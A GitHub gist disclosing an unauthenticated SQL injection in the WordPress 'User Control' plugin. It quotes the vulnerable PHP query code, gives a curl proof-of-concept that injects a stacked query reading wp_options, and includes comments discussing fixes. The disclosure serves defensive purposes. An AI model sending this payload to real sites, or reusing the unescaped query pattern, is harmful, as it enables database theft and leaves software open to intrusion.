Skip to content

Instantly share code, notes, and snippets.

@JustThomas

JustThomas/sqli_wp_user_control.md

Last active May 22, 2021 16:36
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JustThomas/cc6251400b2f7f4f7d4ed900798e9364 to your computer and use it in GitHub Desktop.
Save JustThomas/cc6251400b2f7f4f7d4ed900798e9364 to your computer and use it in GitHub Desktop.
Download ZIP
SQL injection vulnerability in WordPress "User Control" plugin
Raw
sqli_wp_user_control.md

SQL Injection vulnerability in WordPress "User Control" plugin

The User Control plugin gives administrators the possibility to disable user accounts in WordPress. Users whose accounts have been disabled cannot sign in to WordPress anymore. Unfortunately, the plugin has some serious vulnerabilites which anyone can use to perform SQL queries on the WordPress SQL database.

The plugin has been removed from the official WordPress plugin repository. If this plugin is installed on your WordPress installation, you should remove it ASAP.

Vulnerable code

The plugin contains the following code which is executed on every pageload:

if(isset($_POST['disable']))
{
	foreach ( $_POST['users'] as $userid ) {
		$wpdb->query("UPDATE ".$wpdb->prefix."usercontrol SET disable_status = 'disabled' WHERE ID = ".$wpdb->escape($userid));
	}
}

if(isset($_POST['enable']))
{
	foreach ( $_POST['users'] as $userid ) {
		$wpdb->query("UPDATE ".$wpdb->prefix."usercontrol SET disable_status = 'enabled' WHERE ID = ".$wpdb->escape($userid));
	}
}

This code is executed for logged-in users as well as anonymous users. There is no authentication necessary before that code is run.

SQL injection

Any website visitor can abuse this by sending an HTTP POST request with the variable disable=1 and users=1; /* some malicious SQL query statement here */. The malicious SQL query will then be executed.

Example

curl -X POST -d "disable=1&users=1%3B%20SELECT%20%2A%20FROM%20%60wp_options%60" http://localhost/
@ignacionelson
Copy link

ignacionelson commented Feb 15, 2018
edited

Adding && is_user_logged_in() to the if clause should prevent this from happening, unless I'm missing something.
EDIT: That's just quick thought. The check should also validate that the logged in user is an admin

@0xdeadbeer
Copy link

Adding && is_user_logged_in() to the if clause should prevent this from happening, unless I'm missing something.
EDIT: That's just quick thought. The check should also validate that the logged in user is an admin

Well yes but no, if we focus mainly on the SQL injection part that's not how it should be solved. Because the problem is another. You see that $wpdb->escape() ? well that is calling an old and deprecated function of wordpress that does not correctly escape the quotes. And that should already give you an idea of why there's an SQL injection vulnerability in there. How you would solve that is by changing $wpdb->escape to $wpdb->prepare or $wpdb-esc_sql.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment